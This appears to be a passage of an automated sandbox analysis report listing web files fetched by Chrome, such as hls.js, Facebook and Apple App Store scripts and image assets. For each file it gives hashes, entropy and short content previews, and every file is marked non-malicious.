                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:n8rP4RAXuhh2O0NVIWaAPngBeM4zULaDnNfkt6:neP4RAwh2O0NVIWaAPngBeM4zULaDnNr
                                                                                                                                                                                                                                MD5:FEDF0A7355DA0EC2FD483C6269EDE396
                                                                                                                                                                                                                                SHA1:3C16C7280C72CC23FB3E457F819A247F19C2D70B
                                                                                                                                                                                                                                SHA-256:D21C20E127D8A461CF2D71D3004C0A00D721AC2510A0C4D930F5E7394B251540
                                                                                                                                                                                                                                SHA-512:BA3440DD37005534DC400E900A88732EF6A6E1D5435DC9DCE020A7FA909FAEA6A52BAA6F915E165975FCCA878B0F14C9823D53CD5EFD4870C2B93F8BF6AD62DF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:/*! For license information please see hls.js.LICENSE.txt */.!function hy(py){const my=this;var e,t;e=this,t=function(){"use strict";var he,Q,K,e=e=>e&&e.Math===Math&&e,l=e("object"==typeof globalThis&&globalThis)||e("object"==typeof window&&window)||e("object"==typeof my&&my)||e("object"==typeof global&&global)||Function("return this")();class b extends Error{constructor(e,t,i,r,n,a){super(n),this.type=e,this.details=t,this.fatal=i,this.response=r,this.handled=!1,a&&(this.stack=a),n&&(this._message=n)}get message(){return this._message||(this._message=this.constructor.name+` code=`+this.response),this._message}}class pe extends b{constructor(e,t,i,r,n){super(e,t,i,r,n),this.response=r}}class d extends b{constructor(e,t){super(he.NETWORK_ERROR,Q.CERT_LOAD_ERROR,!1,e,t)}}const H={PlaylistNotReceived:-12884,CryptResponseReceivedSlowly:-16833,LivePlaylistUpdateError:-12888,NoResponseFromMediaRequest:-12889,IncompatibleAsset:-12927,CorruptStream:-16041,InternalError:-12645,CantSwitchInTime
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):9316
                                                                                                                                                                                                                                Entropy (8bit):7.975613114638196
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:rPrx5zvCwQ+82YfPGdlx9Rf15JqIWGdK3Sd2MGy/ly4XA:rPFlvS+ZYXGnR95JfPGy/Xw
                                                                                                                                                                                                                                MD5:8FC6DE8717489411CDE6604CF116FEA1
                                                                                                                                                                                                                                SHA1:B3EF77BC017EA29750E2B30B965BAEFEB7A71E0F
                                                                                                                                                                                                                                SHA-256:B996916C905C959327C530A288D6BA58E3B8AE37BF27CBB77467E97E3139EBC8
                                                                                                                                                                                                                                SHA-512:05A1F23E2AD89410F45C40B06346ACA17582EADC2EEA1AA113A7C100DBE68EC18315A50650BAAE39A9C6F2EF1F9B28224F3102E3A166022D218D19CC93415303
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF\$..WEBPVP8 P$...~...*..(.>Q".E#.!..V48...7~>=...3_.........9~.......j...;.w.'w.......?.._.k.e.{...........H...`........_.?.{...........P......{W.................?.....p>..d..{..............j.............u5.o........#.o..#.......w....E..w.m?.?...z......=N~#.g..^...j...W.S....|.........._...?...~.}3.K......J.........'..................u.......uW....cX.Eq.O....z.T0....rs.h.)o..!.Z..c....=P..w.g....!-..N.RN.P#.0...4!X....D.J..G.P3...f....L:.@....v\....,.......,..r..G$...M.k".>.v.b......[.5.1B.q..../K.....Xv2..~u.@..........M}?d].....-.....J_.Sot?.[fMxB..nUu.qJ[{[....R1.....K...z..;{|.......q.\.k.s...f.{....d...\....8.;...o9..J|.[...W...Z..i...0.f.G.........O...c,y.....7.._....)..I.".&....+..t.....0.>..FW...,....B8&.c.3zS..{)5.....rmR.&s...F...!......u...de7...*...F.=.`}o'.........M..r....}.......{)....c..'.^Qja..c.....pFnY'5r.*Lg){...L...g.....$._.`...I.....0...I/.... ...Q......@t.M-s...G@YAI..L%fP.&) ..m.g<.!^.A25.Z....B..{.,.f.....j.q.q...,.,l] ..'k.l
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (60871)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):97946
                                                                                                                                                                                                                                Entropy (8bit):4.976414433545297
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:8mrgoskJlsmFUMsvRYoNgCWflnkO6snajeQO7:8mrBkW76ORJ
                                                                                                                                                                                                                                MD5:79ABB7A1082240DD4B465B9FF64989C5
                                                                                                                                                                                                                                SHA1:3F81542C95E0B17EE41217FF9C11C49A08BE9A53
                                                                                                                                                                                                                                SHA-256:B2ECAC9C8D644496B78DDA8D634E164BBA72F1C8B5B4F841B5B913DEEB399682
                                                                                                                                                                                                                                SHA-512:95C18CD0B04C2366FC195082E47B38D77FC9D73AA701EAF09EB04158510FB6C8F0E3C6E86AFAC876A582DD7AD570DF5B0EBB4E7FF327EF92F287CC4205C3A1B2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yr/r/EIi3C0sPHQ2.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("ProtonColors",["cssVar","color"],(function(a,b,c,d,e,f,g,h){"use strict";var i=!1;function j(a){try{return c("color")(a)}catch(a){return i?c("color")("#000000"):null}}a=function(a,b){a=j(a)||c("color")("#000000");return a.alpha(b).string()};b={white:"#ffffff",black:"#000000",neutral0:"#f9f9fa",neutral10:"#f3f3f6",neutral20:"#edeeef",neutral30:"#e6e8ea",neutral40:"#dee0e4",neutral50:"#d6d9dd",neutral60:"#cdd1d7",neutral70:"#c4c9d0",neutral80:"#bac0c9",neutral90:"#b0b7c2",neutral100:"#a5aebb",neutral110:"#99a4b4",neutral120:"#8d99ad",neutral130:"#808fa6",neutral140:"#72839e",neutral150:"#637797",neutral160:"#596c8c",neutral170:"#4f6182",neutral180:"#455778",neutral190:"#3c4c6d",neutral200:"#334162",neutral210:"#293657",neutral220:"#212b4a",neutral230:"#18203c",neutral240:"#0f142a",darkNeutral0:"#e2e4e8",darkNeutral10:"#d5d8df",darkNeutral20:"#c7cbd4",darkNeutral30:"#b7bcc8",darkNeutral40:"#a8adbc",darkNeutral50:"#9aa0b1",darkNeutral60:"#8c94a8",darkNeutral70:"#808
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):10246
                                                                                                                                                                                                                                Entropy (8bit):7.978999223454442
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:v7jJbSUZezdwCm4Wx+Xz6IVVfrF2LNaCvVnBlhZBRnQ9MuLl9kJbzJT+XQt6egP2:v7jVwqCm8RbrONaCtBrXRn09kJbEg
                                                                                                                                                                                                                                MD5:7645FD5C78AC035544B12627574D410B
                                                                                                                                                                                                                                SHA1:3F70DC0F130CC0D29EA09ADFD62FF9C525BF2EA6
                                                                                                                                                                                                                                SHA-256:AD79026C7E873DCA90C2DB7D126F63B3A29BC5F5A30C787A63B5C65BFEF17D66
                                                                                                                                                                                                                                SHA-512:33BCD63593F476E4486C8328231F0C28C84808927E3AB8668B91B597B6053C8B69B5EEE5E15CEEB5F05C95335708870C449BF23ADCD72709CDF0CF1E19B82CB5
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF.'..WEBPVP8 .'......*..(.>U$.E#.!..8.D.7n..0....~]w.w.!..........c.g._..p.a...?2..|.............?N?..R.o...................~.{......_..w........._.?........6.....K._.S....._P...a.s...../..<|_.;.O...^...._x.E......~..j...;.....5..v.....E..................h?.{../.....+..............a.s........}4.k.k...G...?....9.......w..........=.[./...7.....Ca....Ti.Rt.o2.v.o.}.f...x....'[qt/...E_,....|...7..........P.Q..l.........R.-.....G...L...5.|s.+...z.O.[...dz....b...6.Ku.C...Y..[.V...ea.'.V..y....n.V.?...]W.:.O.}..P.?........d.#LO.h.......:.^.,......:.+..%.....h9q.t...{*.20.ca.NNjm.k..U....P..6..aM.....Q.f..8B...D@..}k......V.yn..b..w....(.,m...d.....+j.n./5k.C?a.ht.W..I...|.-I8.....;$v.3B..;~...JcS.Og.Y.,4.F.P4..QR..P+U-Cq\....8..M......8.z.C|c.UDx|D.^.....s..I.L.M.Url6..r]......GN.C..I .I...HX..u+h".k...-.......`..oMJD.|.Z&...t-y.T...gJ9 .^jM.n.;.Y...I.C..{*.su[....l.iBo9...r..N.@k...{l?..'..$..V;DI..R.7X.|..L%.8.......,.....W+...X,swp>l.Y.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 56 x 56, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):384
                                                                                                                                                                                                                                Entropy (8bit):7.211115598249117
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:6v/lhPop3MRdOU5jtcHFVi9UWlJf4/XIv95niy+x1pbbIqongIh4qwkldp:6v/7gp3Mdb5julpKJKXnVfRXqwk9
                                                                                                                                                                                                                                MD5:EF829389986B47AEE6E88F5278FA1C3D
                                                                                                                                                                                                                                SHA1:183597E1358469FF362F1EA1CA56248C83DD63F1
                                                                                                                                                                                                                                SHA-256:CD9D725F192DCCB71981BDF97E01EA6E8E9D396EF10990B7F2F12061EDE1E71C
                                                                                                                                                                                                                                SHA-512:EEDCB50663B086F5E3B22557C0167C039885D6B632A61D8E3A424E1209FEB0F3A018DC57892BF36DE9CBE5286BB4FEA8B5FB2566A858E4F4D1FA3F30C9F744A3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR...8...8............sRGB........:IDATX...OJ.q.../c.B.g6.......^...)\.......E.CT.H4].i.W.....=.. ...04I.......5E.`.....1....'..iqE$/.{."ol........s.<bR..)R.......)C.X^0..Pe......l.(G.1&.,.<..O.-.L0m..u&.....e.8....;.:..X...:...5m..g..<P&..).-...A..3......)f...9..A.y.D..<. .<R`NF..2.ty'#oTxb...qI...'..&/<c.|...L>(../...a.o3.... ...|....'|.~w....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5430
                                                                                                                                                                                                                                Entropy (8bit):6.21412173346687
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:HW7QHJt9yT9kf/4ktWb0mWGlBp9bPefQMGDnC7Lm/xq+1De2v:20HY6/490mWGnpdefnGwLmY+pee
                                                                                                                                                                                                                                MD5:DFA85BB1FD633C2AB91C0FE07586DA95
                                                                                                                                                                                                                                SHA1:D83ABDEA02E3DC7F9B84841FEC376FA378C0AEC8
                                                                                                                                                                                                                                SHA-256:0D3B03B6B3A5D8D93F2E8E420352906459A9DF4A19A34ACCAC281E7EF1D07856
                                                                                                                                                                                                                                SHA-512:4904E784AB20B9A14BC4423176DF9F7830DE254619AF574E20151EE9831C1E11E6E5B34A7B816BF75380C4D2D1D3D0330154D13D1745BE63EDAE20048B32758C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:............ .h...&... .... .........(....... ..... .................................t..9}..r...........x...l..._...U...Ox..TR.se9.:............U...d...o...j...g...c...\...S...H...@...Bb..WM..m7..z,.....;..8C...H...R...................................ZE..m/..|...}-.97..t6...9..........................................r1......./.?q..0v..{.......+..."....t..%n..)b..+R..<H..T?.......v..x'.../..Mf..:c..........'k..0o..................RA..[).........x&...0.._U..LS..........2U..........u{..zv..........b..........|&.../..vD..bA..........KG......}s..N8..V....g......l#..........&.......7..}0.........c3.......h..g&..k"...d......s$..........%.......8...-.........v!...........c...d..........t...........%.../...;...0.........)...1.......................t..........'...1...;~.5..........4...+...$...*...).......u...u.......x...+...2...;rt.<z..>~...................................6...4...4...@d8.Df..@i..Dp.......................z...7...3...6...6.9.....US..[V..[Y..QW..J]..G
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (1328)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):349993
                                                                                                                                                                                                                                Entropy (8bit):5.357908617608227
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:IaurdhEIEvAr/1G93xWLF+cqt6UqZSebMIzb7CnBWQahL:Ifr/1G93xWJnH7EWQ8L
                                                                                                                                                                                                                                MD5:E3898CF886FE061B936CBEA3F51E872D
                                                                                                                                                                                                                                SHA1:31D6E7833F1FFC22993E1B8B1A3C56C9A19EA89A
                                                                                                                                                                                                                                SHA-256:2C30DDD4EA9E0B822C9A01C8E83DAEEE51AE059665BD4507CD382017E8E8B1B3
                                                                                                                                                                                                                                SHA-512:E18A69D9F735007B8B4B5042A02378B78972A71AF54543B44449B07BCA2A8E806945824749EE217B35DEC00B31BA759D69652AD0317210C29C17DA812D233780
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:/*! For license information please see chunk.739.25e60d65f7e9bdd75f12.js.LICENSE.txt */.(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[739],{2353:function(e,t,r){"use strict".r.r(t),r.d(t,{KNOWN_CAMPAIGN_AND_AFFILIATE_QUERY_PARAMS:function(){return n},KNOWN_MARKETING_QUERY_PARAMS:function(){return a},METRICS_REGISTER_ENDPOINT:function(){return o},MUSIC_AFFILIATIONS_ENDPOINT:function(){return u},PROCESS_REDIRECT_URL_ENDPOINT:function(){return i},TV_AFFILIATIONS_ENDPOINT:function(){return s},default:function(){return f},handleCampaignAndAffiliateUrls:function(){return c}}).var n=["affC","adId","advp","at","ct","itsct","itscg","itscc","itcCt","its_qt","ls","partnerId","pt","qtkid","uo"],a=["mttn3pid","mttnagencyid","mttncc","mttnmyad","mttnmyadg","mttnmycmp","mttnmykw","mttnmypla","mttnmypub","mttnmysite","mttnpid","mttnrefid","mttnsiteid","mttnsub1","mttnsub2","mttnsub3","mttnsubad","mttnsubadgp","mttnsubcmp","mttnsubkw","mttnsubpid","mttnsubplmnt"
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1015)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):994627
                                                                                                                                                                                                                                Entropy (8bit):5.471886698451695
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:qBoMXaFHzsbqCI4/LdRb8uCjZqXVUBkxd:qW2/LEtgUCxd
                                                                                                                                                                                                                                MD5:AEF9FA34A5CA723671AB2D0AB1876E84
                                                                                                                                                                                                                                SHA1:ABBCDBB2BA05ADF02C01145282F4465CF5B1BB4F
                                                                                                                                                                                                                                SHA-256:48804C8E534CE15D25417DAC18E4744E82AEA8C7EA4D7BD55522A395D16BE1E6
                                                                                                                                                                                                                                SHA-512:3C79D9179B86DE0077CBD3114A1352466579D40EB372278CC9648F511C66D3C4F252C813A1638181D1DBFE107C5E38ACD76C3B26872C547E415A8546277F91A2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:window.EmberENV=function(e,t){for(var r in t)e[r]=t[r].return e}(window.EmberENV||{},{FEATURES:{},EXTEND_PROTOTYPES:{Date:!1},_APPLICATION_TEMPLATE_WRAPPER:!1,_DEFAULT_ASYNC_OBSERVERS:!0,_JQUERY_INTEGRATION:!1,_TEMPLATE_ONLY_GLIMMER_COMPONENTS:!0}).var loader,define,requireModule,require,requirejs,runningTests=!1;(function(e){"use strict".function t(){var e=Object.create(null).return e.__=void 0,delete e.__,e}var r={loader:loader,define:define,requireModule:requireModule,require:require,requirejs:requirejs}.requirejs=require=requireModule=function(e){for(var t=[],r=c(e,"(require)",t),n=t.length-1;n>=0;n--)t[n].exports().return r.module.exports},loader={noConflict:function(t){var n,i.for(n in t)t.hasOwnProperty(n)&&r.hasOwnProperty(n)&&(i=t[n],e[i]=e[n],e[n]=r[n])},makeDefaultExport:!0}.var n=t(),i=(t(),0).function o(e){throw new Error("an unsupported module was defined, expected `define(id, deps, module)` instead got: `"+e+"` arguments to define`")}var a=["require","exports","module"].
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):9204
                                                                                                                                                                                                                                Entropy (8bit):7.97905201911326
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:r38tDAWM+egFJt4NPfYUfooEMAY7scQNv1Ees8:gF8frfooLoR95
                                                                                                                                                                                                                                MD5:8F712478B03F2C4DA3183F96248AD1FE
                                                                                                                                                                                                                                SHA1:BA6CF6860F9657FD1F1B8E1BB660A39B589AB0B6
                                                                                                                                                                                                                                SHA-256:5AAC149EED4335B87CAE2FF3E177FBB55D5CE17B49D27A4A5CDAC61A5B89C72B
                                                                                                                                                                                                                                SHA-512:ADB03392D73F6DEA6C1505D622E34C8F068447E1507DC964EB429F81D2839517F1210AD7156BF01875EEAC8B082126E1C12DA2BC5B643873A89352410876081D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://play-lh.googleusercontent.com/_GRprxsBpsoPiM1vG1Qf6nHgqhBePssy13A3rff_JoYV4qn4dYP9Zs5yed_K_QYOdA=w526-h296-rw
                                                                                                                                                                                                                                Preview:RIFF.#..WEBPVP8 .#..0~...*..(.>Q .E#....FD8......6...?#...y........v...O./$........W|....K.w.....{.~......a..O./.....{......E........X..................................?t..............O.}.........|..e.................g...$.v4..oP_m.....'...g.~..l.........?U..xZ......._....~=}6.K.....W./........k......l.]..?...?^..%A7.U...i..Z....X......]....R...z.4X....so...U.G.?.Y......x.G..n.!.V...Y5$.+.].p..?).V.k..@.X....Uh...C.Z...k.Pz.1.).|n.c*.....V..5.J.....`)..c.....C..) ....":..I.G.6.....%.0!.h.....hc.d|.s%.D.g..-..H.V.l.a..=..Cz.\./..V...<.~jB3<..d..g..U.g.H:..[.hsh.........w...S.ov.....Q.D....6....5.lE.&.d..`A.5~.h....o.t[.f.H.!N....[."..0..+..b.G^.......0.........l..r..$]...9.D.W...a.&G.n$......hS.......ZRM.3MLe.EW..nQEpl..u...Y.K..........91...[b<.vi~U^......B$..V.....m.Z@.w5.k..k:..f].zoN....O..q.....I..jr..a...H:#.....l.Nl..Q...4DRo......P..5...$..$z.........E..vs.g[q.U....r.v:.(.>..dGx.......q.V\.....E.m.....J.1.".......<..y....u....f3.g.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):148
                                                                                                                                                                                                                                Entropy (8bit):6.523312318185472
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:clyg1ZreK5l1GzQ9O9xbSj0hGqBBs+dK484MVYQkGAKAJlJwBNlWn:coWZaKBUdSghtBfI43M0VJlJkWn
                                                                                                                                                                                                                                MD5:F6FCD4D43487A3BF8F47A592569FAFEB
                                                                                                                                                                                                                                SHA1:22B1887F1C703EA9ED827A59B02AC7FCDF79CA54
                                                                                                                                                                                                                                SHA-256:C6AEC5614A1193CCECA829712C4027C6F1B94A106395D2223229861AE110A9A4
                                                                                                                                                                                                                                SHA-512:98ECA13BC52869440EE4319FD09AB3C076EFBD51F769052B8C85571236355E50D5426F15CFD67F4DC1942D07D72A0BF0706ACADBDFC5CD2082645CF746778443
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8L..../......j.....]@G....51..C..G.3..<...w..#.O....{.P...I).......T./]......}..1^..|.~.}.B..B%.JP..%.\..%..$..K.Y,".\../?#..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):4000
                                                                                                                                                                                                                                Entropy (8bit):7.931265896262218
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:SMHmIlIS5csGeXxMdTo9mnsoDJbmDLYbX:SSmIlB59GeXaGkZBmDMbX
                                                                                                                                                                                                                                MD5:5B494C32A2CE1E16BE3CDDF444DDEAD3
                                                                                                                                                                                                                                SHA1:F45613851DD0605F3AE2155A668EE0C2BA7AF39D
                                                                                                                                                                                                                                SHA-256:B068E090E697BD9690143866D3272EEA4A18B76BE7E9307AAABED15B498D10ED
                                                                                                                                                                                                                                SHA-512:BD5A399F3B379A94CA96FA95C61BC4610D6D61EE02AB4C5AA2CB27FB1D8A5C7FB699F781E9C5CD6AAEC1E32047F1DD37C5221D7EAB84AACB814B1BEF6153200D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://is1-ssl.mzstatic.com/image/thumb/Purple211/v4/45/63/1c/45631cea-499d-7f62-74ce-b282dfdd0a10/Prod-0-0-1x_U007ephone-0-1-0-85-220.png/230x0w.webp
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8X..............VP8 ....pJ...*....>.N.H.....2J.....nw..&...k.WX'......n.p._.?...........1.O.+.?.g....V.F....~.|..^...................Y{.X`..y.;....8[wO_..;.cmO:.C..f.8.....l..~./0.......(.../4...\.95......W{M....t<.O.0.5..DPi.;.....n/..6..h.o./..x.g..5..&..U..EU.z..?`.E...p.&wG."}.}..;O:.^d..j...r.n......5..L...:..*gt.Rtnig.=.w..Q......X...s...;.O3....E..k;W3.A..)...tGp......'..n....2..2y:..4....>M.....n.......Gf.m..!HHy..ra;#x<&*Nj...^.&..B../<.sA..\.&|.......$.. ...+...P....N..S...S+[..v...`{..s.....g1.tb...{..Z...b"Q....aT..`|[gFd..@....2.t..,lE.C~...^.~7.4.)AN.....cX.4P}....1V(?..'.ijTn`....#../.C.T[..B..O7\..{FK...p.:...........D./g..m.......b&p.g?...>I1...musO.NA..H..T..u.../...3......!>-..Cz.~...S...+..>..T.@.u..S.>`.5....O....".Aq..q.4...E..,....~..+.u..%.....d.....@...@0xI1...4.C.6~. 4..Uw%;\.,........t..g.....D0.l.G.L......~...0&..*.S.....pl..........Z..+.l.O....<d>#S.4..i..2...Q..\../.j...5i..<.T..ev..'......~.......
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3003)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):18440
                                                                                                                                                                                                                                Entropy (8bit):5.255534167782927
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:kz8E0CXVpU4y7FeTEkrHfcBkoNiIvYcaSRCF+q4nAHY+6dDlqW1hCSallZsWY:kz8E0CXVpU4y7ZkrHfcBkSiIvYc/Re+J
                                                                                                                                                                                                                                MD5:5F765A4A59A407D5DAA33CC0B48F2A35
                                                                                                                                                                                                                                SHA1:44E29FDCCC78BAD49465D30F2AD9D5DE816AE150
                                                                                                                                                                                                                                SHA-256:5C98E1CF88ADBADBE52321041E084AA2D5BC4DAAFFBF8EC6C45A438E8D393202
                                                                                                                                                                                                                                SHA-512:ABD01A44A94A0BE2B000DB5BB60A439AFDA8948B32B3F0685AC9AFE175EC9E3701C3747457BE42032C1EA0707AF02109D46187FCA39F2815BD8AEDBBD365F38C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[934],{7934:function(e,t,r){r.r(t),r.d(t,{default:function(){return W}}).var n,o,a=r(32722),i=r(24178).function s(){return o||(o=["app","appVersion","hardwareFamily","hardwareModel","os","osBuildNumber","osLanguages","osVersion","resourceRevNum","screenHeight","screenWidth","userAgent"].concat(["delegateApp","hardwareBrand","storeFrontCountryCode","storeFrontHeader"])),o}var p,c=i.SC.attachDelegate,u=i.Z_.cryptoRandomBase62String,l=i.Z_.exceptionString.function m(e){this.setDelegate({topic:e}),p||(p=!0,s().forEach((function(e){m.prototype[e]=function(t){return t&&t.hasOwnProperty(e)?t[e]:this.environment()[e]()}})))}m._className="eventHandlers.base",m.prototype.setDelegate=function(e){return c(this,e)},m.prototype.topic=function(){throw l(m._className,"topic")},m.prototype.environment=function(){throw l(m._className,"environment")},m.prototype.eventRecorder=function(){throw l(m._className
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:PNG image data, 56 x 56, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):292
                                                                                                                                                                                                                                Entropy (8bit):6.87475365001795
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:6v/lhPo+r1FBRhjfg6GfiM5Si0v7Z/7PBDEaXWaCKdJ9Q4PhLJp:6v/7g+r1nR1I6Gt30vhKaCG95LH
                                                                                                                                                                                                                                MD5:12F3209EEC7A89408D70278032009D42
                                                                                                                                                                                                                                SHA1:8CA4CFCD281AB0560BFA87FF8742047FA6659865
                                                                                                                                                                                                                                SHA-256:AA17F3618C883483CE90CD31AE01807445609641DE04E57154B698DBA3F59BC9
                                                                                                                                                                                                                                SHA-512:D2209AAC8DE020C0376F01CBEE87AC82D537FA0073129148C50A30486D570FB4340C2C0F9B30020C8C7A8B291443608175CEDA46010C1370EFD5E07C8C7EE16E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:.PNG........IHDR...8...8............gAMA......a.....IDATX...*.`...#.....d6.H.9.......u...0+7.,.R,..8.,............g...{.F......$-]=..)..W.6.%.w?]X.?..#.Y.WmcI.z..$A83...p`2..-#I...dA81..y.g"...,H'..d.;.....'.":.O6.......}j6.<u......Fs+...xn..k..7.`.`b.^.qk.x}{....D.0.V"Gvi5....IEND.B`.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1283)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):62120
                                                                                                                                                                                                                                Entropy (8bit):5.200233203039825
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:rPksmcJcApCeZygCoEOuTudKEEB8xAnpFyS5eCyDvmojEWCykh5kNbeAFjg5gvC8:rPksrJCeZygColbQJL5/U
                                                                                                                                                                                                                                MD5:3EA70AE6D554F9FC0FFB8CB0281EC0A6
                                                                                                                                                                                                                                SHA1:58D41E45856B15260F69F19200B6DE7FDCBC82E6
                                                                                                                                                                                                                                SHA-256:A5B0CC4EF0FF84660C52A703030A8F948CC8702EF6B0535CC31FF8611823DBB9
                                                                                                                                                                                                                                SHA-512:00E5EA6FF4C91E1419C4F7FE95815E67C11EDE4849810C2F3371E694622084D439F0E73C855101CB0A1A5B516A8821DE3B2EB1AEB450325F8A38E3EF3B9CC19B
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/chunk.171.ce33468efea141bac957.js
